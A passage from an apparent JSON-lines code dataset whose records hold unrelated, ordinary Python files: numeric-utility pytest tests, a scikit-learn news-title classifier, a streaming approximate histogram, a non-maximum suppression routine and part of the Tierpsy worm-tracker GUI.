2: # disjoint\n assert z['c'] == 1\n elif z['b'] == 3: # overlapping\n assert len(z) == 3\n else:\n assert False\n assert z['d'] == 4\n\n\n@pytest.mark.parametrize(\n 'batch_size, data_size', [\n (3, 30),\n (3, 29),\n (3, 28),\n (2, 2)\n ], ids=['division_mod0', 'division_mod1', 'division_mod2', 'edge_case']\n)\ndef test_gen_ordered_batches(batch_size, data_size):\n from math import ceil\n\n generator = gen_batches(batch_size, data_size)\n unordered_batches = list(generator)\n assert len(unordered_batches) == ceil(data_size/batch_size)\n assert all(len(uob) <= batch_size for uob in unordered_batches)\n\n generator = gen_ordered_batches(batch_size, data_size)\n ordered_batches = list(generator)\n assert len(ordered_batches) == ceil(data_size/batch_size)\n assert all(len(ob) <= batch_size for ob in ordered_batches)\n # Check if each mini-batch is sorted\n assert all(all(ob[i] <= ob[i + 1] for i in range(len(ob) - 1)) for ob in ordered_batches)\n\n\n@pytest.mark.parametrize('dtype', ['torch', 'numpy'], ids=['to', 'np'])\n@pytest.mark.parametrize('axis', [0, 1], ids=['ax_0', 'ax_1'])\ndef test_normalize(dtype, axis):\n for _ in range(10):\n x = to.rand(5, 3) if dtype == 'torch' else np.random.rand(5, 3)\n x_norm = normalize(x, axis=axis, order=1)\n if isinstance(x_norm, to.Tensor):\n x_norm = x_norm.numpy() # for easier checking with pytest.approx\n assert 
np.sum(x_norm, axis=axis) == pytest.approx(1.)\n\n\n@pytest.mark.parametrize(\n 'data_seq, axis', [\n ([np.array([1, 1, 2]), np.array([1, 6, 3]), np.array([1, 6, 3]), np.array([10, -20, 20])], 0),\n ([np.array([1, 1, 2]), np.array([1, 6, 3]), np.array([1, 6, 3]), np.array([10, -20, 20])], None),\n ([np.array([1, 1, 2, 2]), np.array([1, 6, 3]), np.array([1, 6, 3]), np.array([10, 10, -20, 20])], 0),\n ([np.array([1, 1, 2, 2]), np.array([1, 6, 3]), np.array([1, 6, 3]), np.array([10, 10, -20, 20])], None),\n (\n [to.tensor([1., 1., 2]), to.tensor([1., 6., 3.]), to.tensor([1., 6., 3.]),\n to.tensor([10., -20., 20.])],\n 0),\n (\n [to.tensor([1., 1., 2]), to.tensor([1., 6., 3.]), to.tensor([1., 6., 3.]),\n to.tensor([10., -20., 20.])],\n -1),\n (\n [to.tensor([1., 1, 2, 2]), to.tensor([1., 6, 3]), to.tensor([1., 6, 3]),\n to.tensor([10., 10, -20, 20])],\n 0),\n (\n [to.tensor([1., 1, 2, 2]), to.tensor([1., 6, 3]), to.tensor([1., 6, 3]),\n to.tensor([10., 10, -20, 20])],\n -1),\n ], ids=['np_same_length_0', 'np_same_length_None', 'np_mixed_length_0', 'np_mixed_length_None',\n 'to_same_length_0', 'to_same_length_-1', 'to_mixed_length_0', 'to_mixed_length_-1']\n)\ndef test_running_standardizer(data_seq, axis):\n rs = RunningStandardizer()\n for data in data_seq:\n z = rs(data, axis)\n assert z is not None\n rs.reset()\n assert rs._mean is None and rs._sum_sq_diffs is None and rs._iter == 0\n\n\n@pytest.mark.parametrize(\n 'data_seq, alpha', [\n (\n [np.array([1, 1, 2]), np.array([1, 6, 3]), np.array([1, 6, 3]), np.array([10, -20, 20])],\n 0.9\n ),\n (\n [to.tensor([1., 1., 2]), to.tensor([1., 6., 3.]), to.tensor([1., 6., 3.]), to.tensor([10., -20., 20.])],\n 0.1\n ),\n ], ids=['np', 'to']\n)\ndef test_running_expdecay_average(data_seq, alpha):\n reda = RunningExpDecayingAverage(alpha)\n for data in data_seq:\n z = reda(data)\n assert z is not None\n reda.reset(alpha=0.5)\n assert reda._alpha == 0.5 and reda._prev_est is None\n\n\n@pytest.mark.parametrize(\n 'data_seq, capacity', [\n (\n [np.array([1., 1, 2]), np.array([1., 1, 2]), np.array([1., 1, 2]), np.array([-2., -2, -4])],\n 3\n ),\n (\n [to.tensor([1., 1, 2]), to.tensor([1., 1, 2]), to.tensor([1., 1, 2]), to.tensor([-2., -2, -4])],\n 3\n ),\n ], ids=['np', 'to']\n)\ndef test_running_mem_average(data_seq, capacity):\n rma = RunningMemoryAverage(capacity)\n for i, data in enumerate(data_seq):\n z = rma(data)\n if i <= 2:\n to.testing.assert_allclose(z, to.tensor([1., 1, 2])) # works with PyTorch Tensors and numpy arrays\n elif i == 3:\n to.testing.assert_allclose(z, to.tensor([0., 0, 0])) # works with PyTorch Tensors and numpy arrays\n rma.reset(capacity=5)\n assert rma.capacity == 5 and rma.memory is None\n\n\n@pytest.mark.parametrize(\n 'data_seq', [\n [5*np.random.rand(25, 3), 0.1*np.random.rand(5, 3), 20*np.random.rand(70, 3)],\n [5*to.rand(25, 3), 0.1*to.rand(5, 3), 20*to.rand(70, 3)]\n ], ids=['np', 'to']\n)\ndef test_running_normalizer(data_seq):\n rn = RunningNormalizer()\n for data in data_seq:\n data_norm = rn(data)\n assert (-1 <= data_norm).all()\n assert (data_norm <= 1).all()\n\n\n@pytest.mark.parametrize(\n 'x', [\n to.rand(1000, 1),\n to.rand(1, 1000),\n to.rand(1000, 1000),\n np.random.rand(1, 1000),\n np.random.rand(1000, 1),\n np.random.rand(1000, 1000)\n ], ids=['to_1x1000', 'to_1000x1', 'to_1000x1000', 'np_1x1000', 'np_1000x1', 'np_1000x1000']\n)\ndef test_stateful_standardizer(x):\n ss = Standardizer()\n\n if isinstance(x, to.Tensor):\n x_stdized = ss.standardize(x)\n assert x_stdized.shape == x.shape\n assert 
to.allclose(x_stdized.mean(), to.zeros(1))\n assert to.allclose(x_stdized.std(), to.ones(1))\n\n x_restrd = ss.unstandardize(x_stdized)\n assert x_restrd.shape == x.shape\n assert to.allclose(x_restrd, x, rtol=1e-02, atol=1e-05)\n\n elif isinstance(x, np.ndarray):\n x_stdized = ss.standardize(x)\n assert x_stdized.shape == x.shape\n assert np.allclose(x_stdized.mean(), np.zeros(1))\n assert np.allclose(x_stdized.std(), np.ones(1))\n\n x_restrd = ss.unstandardize(x_stdized)\n assert x_restrd.shape == x.shape\n assert np.allclose(x_restrd, x, rtol=1e-02, atol=1e-05)\n\n\n@pytest.mark.parametrize(\n 'g, ed', [\n (1., 2.),\n (np.array([-1., 2.]), np.eye(2))\n ], ids=['scalar', 'array']\n)\ndef test_ds_spec(g, ed):\n # Base class\n dss = DSSpec(function='name', goal=g)\n assert isinstance(dss, dict)\n assert dss['function'] == 'name'\n if isinstance(g, np.ndarray):\n assert np.all(dss['goal'] == g)\n else:\n assert dss['goal'] == g\n\n # Linear first order subclass\n lds = LinDSSpec(function='lin', goal=g, errorDynamics=ed)\n assert isinstance(dss, dict)\n assert lds['function'] == 'lin'\n if isinstance(g, np.ndarray):\n assert np.all(lds['goal'] == g)\n assert np.all(lds['errorDynamics'] == ed)\n else:\n assert lds['goal'] == g\n assert lds['errorDynamics'] == ed\n\n # Mass-Spring-Damper subclass\n msds = MSDDSSpec(function='msd', goal=g, damping=2., attractorStiffness=3., mass=4.)\n assert isinstance(dss, dict)\n assert msds['function'] == 'msd'\n if isinstance(g, np.ndarray):\n assert np.all(msds['goal'] == g)\n else:\n assert msds['goal'] == g\n assert msds['damping'] == 2.\n assert msds['attractorStiffness'] == 3.\n assert msds['mass'] == 4.\n\n\n@pytest.mark.optim\n@pytest.mark.visualization\n@pytest.mark.parametrize(\n 'identical_bounds', [\n True, False\n ], ids=['identical', 'separate']\n)\ndef test_gss_optimizer_identical_bounds(identical_bounds):\n class Dummy:\n def loss_fcn(self):\n # Some function to minimize\n return (self.x + self.y + 4)**2\n\n def __init__(self):\n # Test with different lower and upper bounds\n self.x, self.y = to.tensor([0.]), to.tensor([4.])\n x_min, x_max = to.tensor([-10.]), to.tensor([5.])\n if identical_bounds:\n self.optim = GSS([{'params': self.x}, {'params': self.y}], x_min, x_max)\n else:\n x_min_override = to.tensor([-6.])\n self.optim = GSS([{'params': self.x, 'param_min': x_min_override}, {'params': self.y}], x_min, x_max)\n print(self.optim)\n\n dummy = Dummy()\n\n for i in range(2):\n dummy.optim.step(dummy.loss_fcn)\n assert dummy.x != dummy.y\n print(f'x = {dummy.x.item()} \\t y = {dummy.y.item()}')\n\n\n@pytest.mark.optim\ndef test_gss_optimizer_functional():\n class Dummy:\n def loss_fcn(self):\n # Some function to minimize\n return (self.x + 4)**2\n\n def __init__(self):\n # Test with different lower and upper bounds\n self.x = to.tensor([0.])\n x_min, x_max = to.tensor([-10.]), to.tensor([10.])\n self.optim = GSS([{'params': self.x}], x_min, x_max)\n\n dummy = Dummy()\n\n for i in range(100):\n dummy.optim.step(dummy.loss_fcn)\n assert to.norm(dummy.x + 4) < 1e-4\n\n\n@pytest.mark.optim\n@pytest.mark.visualization\ndef test_gss_optimizer_nlin_fcn():\n from matplotlib import pyplot as plt\n # Parameters\n x_grid = to.linspace(-2., 3., 200)\n f = 1.\n noise_std = 0.1\n\n # Init param and optimizer\n x_init = to.rand(1)*(x_grid.max() - x_grid.min())/2 + x_grid.min() + (x_grid.max() - x_grid.min())/4 # [.25, .75]\n x = nn.Parameter(to.tensor([x_init]), requires_grad=False)\n optim = GSS([x], param_min=x_grid.min().unsqueeze(0), 
param_max=x_grid.max().unsqueeze(0))\n obj_fcn = partial(noisy_nonlin_fcn, x=x, f=f, noise_std=noise_std)\n num_epochs = 10\n\n # Init plotting\n fig = plt.figure()\n plt.plot(x_grid, noisy_nonlin_fcn(x=x_grid, f=f), label='noise free fcn')\n plt.scatter(x.data.numpy(), obj_fcn().numpy(), s=40, marker='x', color='k', label='init guess')\n colors = plt.get_cmap('inferno')(np.linspace(0, 1, num_epochs))\n\n for e in tqdm(range(num_epochs), total=num_epochs):\n # Evaluate at a the current point\n optim.step(obj_fcn)\n\n # Plot current evaluation\n plt.plot(x_grid, noisy_nonlin_fcn(x=x_grid, f=f, noise_std=noise_std), alpha=0.2)\n plt.scatter(x.data.numpy(), obj_fcn().numpy(), s=16, color=colors[e])\n\n plt.xlabel('$x$')\n plt.ylabel('$f(x)$')\n plt.legend()\n plt.show()\n assert noisy_nonlin_fcn(x, f=f, noise_std=noise_std) < noisy_nonlin_fcn(x_init, f=f, noise_std=noise_std)\n\n\n@pytest.mark.parametrize('in_features', [1, 3], ids=['1dim', '3dim'])\n@pytest.mark.parametrize('same_nonlin', [True, False], ids=['same_nonlin', 'different_nonlin'])\n@pytest.mark.parametrize('bias', [True, False], ids=['bias', 'no_bias'])\n@pytest.mark.parametrize('weight', [True, False], ids=['weight', 'no_weight'])\ndef test_indi_nonlin_layer(in_features, same_nonlin, bias, weight):\n if not same_nonlin and in_features > 1:\n nonlin = in_features*[to.tanh]\n else:\n nonlin = to.sigmoid\n layer = IndiNonlinLayer(in_features, nonlin, bias, weight)\n assert isinstance(layer, nn.Module)\n\n i = to.randn(in_features)\n o = layer(i)\n assert isinstance(o, to.Tensor)\n assert i.shape == o.shape\n"} {"ext": "py", "sha": "1a2fe54d88c1e5c718bd8552ab2e975dc2d3be6e", "content": "# --------------\n# import packages\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\nimport re\nfrom nltk.corpus import stopwords\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score ,confusion_matrix\n\n\n# Code starts here\n\n# load data\nnews = pd.read_csv(path)\n\n# subset data\nnews = news[['TITLE','CATEGORY']]\n# distribution of classes\ndist = news['CATEGORY'].value_counts()\n\n# display class distribution\nprint(dist.head())\n\n# display data\nprint(news.head())\n\n# Code ends here\n\n\n# --------------\n# Code starts here\n\n# stopwords \nstop = (set(stopwords.words('english')))\n# retain only alphabets\nnews['TITLE'] = news['TITLE'].apply(lambda x : re.sub(\"[^a-zA-Z]\", \" \",x) )\n\n# convert to lowercase and tokenize\nnews['TITLE'] = news['TITLE'].apply(lambda x : x.lower().split())\n\n# remove stopwords\nnews['TITLE'] = news['TITLE'].apply(lambda x : [i for i in x if i not in stop])\n\n# join list elements\nprint(news['TITLE'].head(2))\nnews['TITLE'] = news['TITLE'].apply(lambda x : ' '.join(x))\nprint(news['TITLE'].head(2))\n# split into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(news['TITLE'], news['CATEGORY'], test_size=0.2, random_state=3)\n\n# Code ends here\n\n\n# --------------\n# Code starts here\n\n# initialize count vectorizer\ncount_vectorizer = CountVectorizer()\n\n# initialize tfidf vectorizer\ntfidf_vectorizer = TfidfVectorizer(ngram_range=(1,3))\n\n# fit and transform with count vectorizer\nX_train_count= count_vectorizer.fit_transform(X_train)\nX_test_count = 
count_vectorizer.transform(X_test)\n\n# fit and transform with tfidf vectorizer\nX_train_tfidf= tfidf_vectorizer.fit_transform(X_train)\nX_test_tfidf = tfidf_vectorizer.transform(X_test)\n# Code ends here\n\n\n# --------------\n# Code starts here\n\n# initialize multinomial naive bayes\nnb_1 = MultinomialNB()\nnb_2 = MultinomialNB()\n\n# fit on count vectorizer training data\nnb_1.fit(X_train_count, y_train)\n# fit on tfidf vectorizer training data\nnb_2.fit(X_train_tfidf, y_train)\n\n# accuracy with count vectorizer\nacc_count_nb = accuracy_score(nb_1.predict(X_test_count), y_test)\n\n# accuracy with tfidf vectorizer\nacc_tfidf_nb = accuracy_score(nb_2.predict(X_test_tfidf), y_test)\n\n# display accuracies\nprint('Count Vectorizer accuracy is', acc_count_nb)\nprint('TFIDF accuracy is', acc_tfidf_nb)\n\n\n# Code ends here\n\n\n# --------------\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# initialize logistic regression\nlogreg_1 = OneVsRestClassifier(LogisticRegression(random_state=10))\nlogreg_2 = OneVsRestClassifier(LogisticRegression(random_state=10))\n\n# fit on count vectorizer training data\nlogreg_1.fit(X_train_count, y_train)\nlogreg_2.fit(X_train_tfidf, y_train)\n# fit on tfidf vectorizer training data\nacc_count_logreg = accuracy_score(logreg_1.predict(X_test_count), y_test)\nacc_tfidf_logreg = accuracy_score(logreg_2.predict(X_test_tfidf), y_test)\n# accuracy with count vectorizer\nprint('Count vectorizer accurancy is', acc_count_logreg)\n# accuracy with tfidf vectorizer\nprint('TFIDF accuracy is', acc_tfidf_logreg)\n\n# display accuracies\n\n\n# Code ends here\n\n\n"} {"ext": "py", "sha": "1a2fe588feedd1327744d61141ef0189c19be486", "content": "from bisect import bisect_right\nfrom itertools import accumulate\nfrom math import inf, sqrt\nfrom numbers import Number\n\n\nclass ApproximateHistogram:\n \"\"\"\n Streaming, approximate histogram\n\n Based on http://jmlr.org/papers/volume11/ben-haim10a/ben-haim10a.pdf\n\n Performance of adding a point is about 5x faster than\n https://github.com/carsonfarmer/streamhist (unmaintained).\n\n The output of quantile() will match numpy.quantile() exactly until\n the number of points reaches max_bins, and then gracefully transition\n to an approximation.\n \"\"\"\n\n def __init__(self, max_bins):\n self._max_bins = max_bins\n self._bins = [] # (point, count)\n self._costs = [] # item i is _bins[i+1].point - _bins[i].point\n self._count = 0\n # TODO: maintain min/max as bin entries with infinite merge cost\n self._min = inf\n self._max = -inf\n\n @staticmethod\n def _update_costs(costs, l, i, val):\n \"\"\"update costs array to reflect l.insert(i, val)\"\"\"\n if i > 0:\n new_cost = val[0] - l[i - 1][0]\n costs.insert(i - 1, new_cost)\n if i < len(costs):\n costs[i] = l[i + 1][0] - val[0]\n elif len(l) > 1:\n costs.insert(0, l[1][0] - val[0])\n # assert costs == approx([b - a for (a, _), (b, _) in zip(l, l[1:])], rel=1e-4)\n\n @staticmethod\n def _update_costs_for_merge(costs, l, i, val):\n \"\"\"update costs array to reflect l[i:i+2] = (val, )\"\"\"\n # TODO: combine with update_costs()\n if 0 < i < len(costs) - 1:\n costs[i - 1:i + 2] = val[0] - l[i - 1][0], l[i + 1][0] - val[0]\n elif i > 0:\n costs[i - 1:i + 1] = (val[0] - l[i - 1][0], )\n else:\n costs[i:i + 2] = (l[i + 1][0] - val[0], )\n # assert costs == approx([b - a for (a, _), (b, _) in zip(l, l[1:])], rel=1e-4)\n\n @classmethod\n def _insert_with_cost(cls, costs, l, val):\n i = bisect_right(l, val)\n l.insert(i, val)\n cls._update_costs(costs, l, i, val)\n\n def 
add(self, point):\n \"\"\"Add point to histogram\"\"\"\n # optimization: maintain cost array\n self._count += 1\n self._min = min(self._min, point)\n self._max = max(self._max, point)\n bins = self._bins\n costs = self._costs\n self._insert_with_cost(costs, bins, (point, 1))\n if len(bins) > self._max_bins:\n i = costs.index(min(costs))\n (q0, k0), (q1, k1) = bins[i:i+2]\n _count = k0 + k1\n median = (q0 * k0 + q1 * k1) / _count\n bins[i:i+2] = ((median, _count), )\n self._update_costs_for_merge(costs, bins, i, (median, _count))\n\n @property\n def count(self):\n \"\"\"Return number of points represented by this histogram.\"\"\"\n return self._count\n\n @property\n def min(self):\n \"\"\"Return minimum point represented by this histogram\"\"\"\n return self._min\n\n @property\n def max(self):\n \"\"\"Return maximum point represented by this histogram\"\"\"\n return self._max\n\n def mean(self):\n \"\"\"Return mean; O(max_bins) complexity.\"\"\"\n return sum(p * count for p, count in self._bins) / self._count\n\n def std(self):\n \"\"\"Return standard deviation; O(max_bins) complexity.\"\"\"\n mean = self.mean()\n sum_squares = sum((p - mean) ** 2 * count for p, count in self._bins)\n return sqrt(sum_squares / self._count)\n\n def _quantile(self, sums, q):\n if q <= 0:\n return self._min\n if q >= 1:\n return self._max\n bins = self._bins\n target_sum = q * (self._count - 1) + 1\n i = bisect_right(sums, target_sum) - 1\n left = bins[i] if i >= 0 else (self._min, 0)\n right = bins[i+1] if i+1 < len(bins) else (self._max, 0)\n l0, r0 = left[0], right[0]\n l1, r1 = left[1], right[1]\n s = target_sum - (sums[i] if i >= 0 else 1)\n if l1 <= 1 and r1 <= 1:\n # We have exact info at this quantile. Match linear interpolation\n # strategy of numpy.quantile().\n b = l0 + (r0 - l0) * s / r1 if r1 > 0 else l0\n else:\n if r1 == 1:\n # For exact bin on RHS, compensate for trapezoid interpolation using\n # only half of count.\n r1 = 2\n if l1 == r1:\n bp_ratio = s / l1\n else:\n bp_ratio = (l1 - (l1 ** 2 - 2 * s * (l1 - r1)) ** .5) / (l1 - r1)\n assert bp_ratio.imag == 0\n b = bp_ratio * (r0 - l0) + l0\n return b\n\n def sum(self):\n \"\"\"Return sum of points; O(max_bins) complexity.\"\"\"\n return sum(x * count for x, count in self._bins)\n\n def quantile(self, q):\n \"\"\"Return list of values at given quantile fraction(s); O(max_bins) complexity.\"\"\"\n # Deviation from Ben-Haim sum strategy:\n # * treat count 1 bins as \"exact\" rather than dividing the count at the point\n # * for neighboring exact bins, use simple linear interpolation matching\n # numpy.quantile()\n if isinstance(q, Number):\n q = (q, )\n bins = self._bins\n sums = [x - (y/2 if y > 1 else 0) for x, (_, y) in \\\n zip(accumulate(bin[1] for bin in bins), bins)]\n return list(self._quantile(sums, q_item) for q_item in q)\n"} {"ext": "py", "sha": "1a2fe743e17247433559d43f10d9b87dd9e11ea7", "content": "import numpy as np\n\ndef scroll(clip, h=None, w=None, x_speed=0, y_speed=0,\n x_start=0, y_start=0, apply_to=\"mask\"):\n \"\"\" Scrolls horizontally or vertically a clip, e.g. 
to make fin\n credits \"\"\"\n if h is None: h = clip.h\n if w is None: w = clip.w\n \n xmax = clip.w-w-1\n ymax = clip.h-h-1\n\n def f(gf,t):\n x = max(0, min(xmax, x_start+ np.round(x_speed*t)))\n y = max(0, min(ymax, y_start+ np.round(y_speed*t)))\n return gf(t)[y:y+h, x:x+w]\n \n return clip.fl(f, apply_to = apply_to)\n"} {"ext": "py", "sha": "1a2fe7ee1460e4c36f5e3ec530fe14354abcca3a", "content": "\"\"\"Non-Maximum Suppression module.\"\"\"\nimport numpy as np\nimport torch\n\n\ndef nms(detections, threshold):\n \"\"\"Apply Non-Maximum Suppression over the detections.\n The detections must be a tensor with two dimensions: (number of detections, 5).\n Why 5? Because a detection has x1, y1, x2, y2 and score.\n\n Heavily inspired by Adrian Rosebrock at:\n https://www.pyimagesearch.com/2015/02/16/faster-non-maximum-suppression-python/\n\n Why not the version of GPU? Because I couldn't make it work in my GPU.\n\n Args:\n detections (torch.Tensor): A tensor with all the detections. The shape must be\n (number of detections, 5) with the score as the last value of the second\n dimension.\n threshold (float): The threshold for the IoU (intersection over union) to take\n two detections as detecting the same object.\n\n Returns:\n torch.Tensor: A tensor with the indexes of the detections to keep.\n \"\"\"\n # If there aren't detections return empty\n if detections.shape[0] == 0:\n return torch.zeros((0))\n\n # Get the numpy version\n was_cuda = detections.is_cuda\n detections = detections.cpu().numpy()\n\n # Start the picked indexes list empty\n picked = []\n\n # Get the coordinates\n x1 = detections[:, 0]\n y1 = detections[:, 1]\n x2 = detections[:, 2]\n y2 = detections[:, 3]\n scores = detections[:, 4]\n\n # Compute the area of the bounding boxes\n areas = (x2 - x1 + 1) * (y2 - y1 + 1)\n\n # Get the indexes of the detections sorted by score\n indexes = np.argsort(scores)\n\n while len(indexes) > 0:\n # Take the last index (highest score) and add it to the picked\n last = len(indexes) - 1\n actual = indexes[last]\n picked.append(actual)\n\n # We need to find the overlap of the bounding boxes with the actual picked bounding box\n\n # Find the largest (more to the bottom-right) (x,y) coordinates for the start\n # (top-left) of the bounding box\n xx1 = np.maximum(x1[actual], x1[indexes[:last]])\n yy1 = np.maximum(y1[actual], y1[indexes[:last]])\n # Find the smallest (more to the top-left) (x,y) coordinates for the end (bottom-right)\n # of the bounding box\n xx2 = np.minimum(x2[actual], x2[indexes[:last]])\n yy2 = np.minimum(y2[actual], y2[indexes[:last]])\n\n # Compute width and height to compute the intersection over union\n w = np.maximum(0, xx2 - xx1 + 1)\n h = np.maximum(0, yy2 - yy1 + 1)\n intersection = (w * h)\n union = areas[actual] + areas[indexes[:last]] - intersection\n iou = intersection / union\n \n # Delete the last index and all that overlap is bigger than threshold\n indexes = np.delete(indexes, np.concatenate(([last], np.where(iou > threshold)[0])))\n\n # Return the picked indexes\n picked = torch.Tensor(picked).long()\n if was_cuda:\n picked = picked.cuda()\n\n return picked\n"} {"ext": "py", "sha": "1a2fe94d05b3883bd5969cc6fc5bcb6944bdaec8", "content": "import os\nfrom functools import partial\nimport numpy as np\nimport pandas as pd\nimport tables\nimport matplotlib\nimport warnings\n\nfrom PyQt5.QtCore import Qt, QPointF\nfrom PyQt5.QtGui import QPixmap, QPainter, QFont, QPen, QPolygonF, QColor, QKeySequence, QBrush\nfrom PyQt5.QtWidgets import QApplication, 
QMessageBox\n\nfrom tierpsy.analysis.ske_create.helperIterROI import getWormROI\nfrom tierpsy.analysis.split_fov.FOVMultiWellsSplitter import FOVMultiWellsSplitter\n\nfrom tierpsy.gui.MWTrackerViewer_ui import Ui_MWTrackerViewer\nfrom tierpsy.gui.TrackerViewerAux import TrackerViewerAuxGUI\nfrom tierpsy.gui.PlotFeatures import PlotFeatures\n\nfrom tierpsy.helper.misc import WLAB, save_modified_table\nfrom tierpsy.analysis.split_fov.helper import get_well_color\n\n\nclass WellsDrawer(TrackerViewerAuxGUI):\n '''\n Dummy class with the wells division drawer functions\n '''\n def __init__(self, ui):\n super().__init__(ui)\n # colour\n self.fovsplitter_mask = None\n self.fovsplitter_feat = None\n self.fovsplitter = None\n self.is_fov_tosplit = None\n\n\n def updateVideoFile(self, vfilename):\n super().updateVideoFile(vfilename)\n # check if /fov_wells exists in masked video\n if self.fid is not None:\n if '/fov_wells' not in self.fid:\n self.is_fov_tosplit = False\n else:\n self.is_fov_tosplit = True\n # if it exists, read it\n if self.is_fov_tosplit:\n# self.wells_in_mask = pd.DataFrame(\n# self.fid.get_node('/fov_wells').read())\n self.fovsplitter_mask = FOVMultiWellsSplitter(self.vfilename)\n\n def updateSkelFile(self, skeletons_file):\n super().updateSkelFile(skeletons_file)\n # if no skeletons, skip\n if not self.skeletons_file:\n return\n # check if /fov_wells exists in features video\n with tables.File(self.skeletons_file, 'r') as fid:\n if '/fov_wells' not in fid:\n self.is_fov_tosplit = False\n# print(\"didn't find fov wells though\")\n else:\n self.is_fov_tosplit = True\n# print(\"found fov wells in featuresN\")\n # if it exists, read it\n if self.is_fov_tosplit:\n# print('reading fov_wells from featuresN')\n# print('pre-reading:')\n# print(self.wells)\n# self.wells_in_feat = pd.DataFrame(\n# fid.get_node('/fov_wells').read())\n self.fovsplitter_feat = FOVMultiWellsSplitter(self.skeletons_file)\n\n\n def draw_wells(self, image):\n '''\n Draw wells.\n '''\n if self.is_fov_tosplit:\n if self.fovsplitter_feat is not None:\n self.fovsplitter = self.fovsplitter_feat\n else: # fall back to mask ones\n print('falling back')\n self.fovsplitter = self.fovsplitter_mask\n\n # prepare constants for drawing\n self.fontsize = max(1, max(image.height(), image.width()) // 60)\n penwidth = max(1, max(image.height(), image.width()) // 400)\n self.penwidth = penwidth if penwidth % 2 == 1 else penwidth + 1\n# self.wellsC = QColor(250, 140, 0)\n if 'is_good_well' in self.fovsplitter.wells.columns:\n is_color_by_well = True\n else:\n is_color_by_well = False\n # Qt drawing code\n painter = QPainter()\n painter.begin(image)\n pen = QPen()\n pen.setWidth(self.penwidth)\n painter.setFont(QFont('Decorative', self.fontsize))\n # loop on wells\n for _, well in self.fovsplitter.wells.iterrows():\n # update color every time\n if is_color_by_well:\n wellC = get_well_color(well['is_good_well'], forCV=True)\n wellC = QColor(*wellC)\n else:\n wellC = QColor(250, 140, 0)\n pen.setColor(wellC)\n painter.setPen(pen)\n # draw well name\n painter.drawText(well['x_min'] + self.fontsize*0.4,\n well['y_min'] + self.fontsize*1.2,\n well['well_name'])\n # draw rectangle\n painter.drawRect(well['x_min'],\n well['y_min'],\n well['x_max'] - well['x_min'],\n well['y_max'] - well['y_min'])\n if well['is_good_well'] == False:\n painter.drawLine(well['x_min'],\n well['y_min'],\n well['x_max'],\n well['y_max'])\n painter.end()\n\n\n\n\n# super().keyPressEvent(event)\n\n\nclass ContourDrawer(TrackerViewerAuxGUI):\n '''\n Dummy class 
with the contour functions\n '''\n def __init__(self, ui):\n super().__init__(ui)\n\n self.food_coordinates = None\n self.wlabC = {\n WLAB['U']: Qt.white,\n WLAB['WORM']: Qt.green,\n WLAB['WORMS']: Qt.blue,\n WLAB['BAD']: Qt.darkRed,\n WLAB['GOOD_SKE']: Qt.darkCyan\n }\n self.ui.checkBox_showFood.stateChanged.connect(self.updateImage)\n self.ui.checkBox_showFood.setEnabled(False)\n self.ui.checkBox_showFood.setChecked(True)\n\n def updateSkelFile(self, skeletons_file):\n\n super().updateSkelFile(skeletons_file)\n if not self.skeletons_file or self.trajectories_data is None:\n self.food_coordinates = None\n return\n\n with tables.File(self.skeletons_file, 'r') as fid:\n if not '/food_cnt_coord' in fid:\n self.food_coordinates = None\n self.ui.checkBox_showFood.setEnabled(False)\n else:\n #change from microns to pixels\n self.food_coordinates = fid.get_node('/food_cnt_coord')[:]\n self.food_coordinates /= self.microns_per_pixel\n\n self.ui.checkBox_showFood.setEnabled(True)\n\n def draw_food_contour(self, image):\n if self.food_coordinates is None or not self.ui.checkBox_showFood.isChecked():\n return\n\n painter = QPainter()\n painter.begin(image)\n\n penwidth = max(1, max(image.height(), image.width()) // 800)\n col = Qt.darkMagenta\n p = QPolygonF()\n for x,y in self.food_coordinates:\n p.append(QPointF(x,y))\n\n pen = QPen()\n pen.setWidth(penwidth)\n pen.setColor(col)\n painter.setPen(pen)\n\n painter.drawPolyline(p)\n painter.end()\n\nclass IntensityLabeler(TrackerViewerAuxGUI):\n def __init__(self, ui):\n super().__init__(ui)\n\n self.mean_intensity = None\n self.ui.intensity_label.setStyleSheet('') #avoid displaying color at the start of the programı\n\n def updateVideoFile(self, vfilename):\n super().updateVideoFile(vfilename)\n if self.fid is not None:\n #get mean intensity information.\n #Useful for the optogenetic experiments.\n try:\n mean_int = self.fid.get_node('/mean_intensity')[:]\n\n #calculate the intensity range and normalize the data.\n #I am ignoring any value less than 1. 
The viewer only works with uint8 data.\n\n dd = mean_int[mean_int>=1]\n if dd.size == 0:\n raise ValueError\n\n bot = np.min(dd)\n top = np.max(dd)\n rr = top-bot\n\n # if the mean value change is less than 1 (likely continous image do nothing)\n if rr <= 1:\n raise ValueError\n\n self.mean_intensity = (mean_int-bot)/(rr)\n\n except (tables.exceptions.NoSuchNodeError, ValueError):\n self.mean_intensity = None\n self.ui.intensity_label.setStyleSheet('')\n\n def display_intensity(self):\n if self.mean_intensity is not None and self.frame_number < self.mean_intensity.size:\n d = int(self.mean_intensity[self.frame_number]*255)\n self.ui.intensity_label.setStyleSheet('QLabel {background-color: rgb(%i, %i, %i);}' % (0, 0, d))\n\nclass BlobLabeler(TrackerViewerAuxGUI):\n def __init__(self, ui):\n super().__init__(ui)\n self.wlab = WLAB\n self.label_type = 'worm_label'\n\n self.ui.pushButton_U.clicked.connect(\n partial(self._h_tag_worm, self.wlab['U']))\n self.ui.pushButton_W.clicked.connect(\n partial(self._h_tag_worm, self.wlab['WORM']))\n self.ui.pushButton_WS.clicked.connect(\n partial(self._h_tag_worm, self.wlab['WORMS']))\n self.ui.pushButton_B.clicked.connect(\n partial(self._h_tag_worm, self.wlab['BAD']))\n\n self.ui.pushButton_W.setShortcut(QKeySequence(Qt.Key_W))\n self.ui.pushButton_U.setShortcut(QKeySequence(Qt.Key_U))\n self.ui.pushButton_WS.setShortcut(QKeySequence(Qt.Key_C))\n self.ui.pushButton_B.setShortcut(QKeySequence(Qt.Key_B))\n\n\n def enable_label_buttons(self, value):\n self.ui.pushButton_U.setEnabled(value)\n self.ui.pushButton_W.setEnabled(value)\n self.ui.pushButton_WS.setEnabled(value)\n self.ui.pushButton_B.setEnabled(value)\n\n\n def _h_tag_worm(self, label_ind):\n if not self.worm_index_type == 'worm_index_manual':\n return\n\n 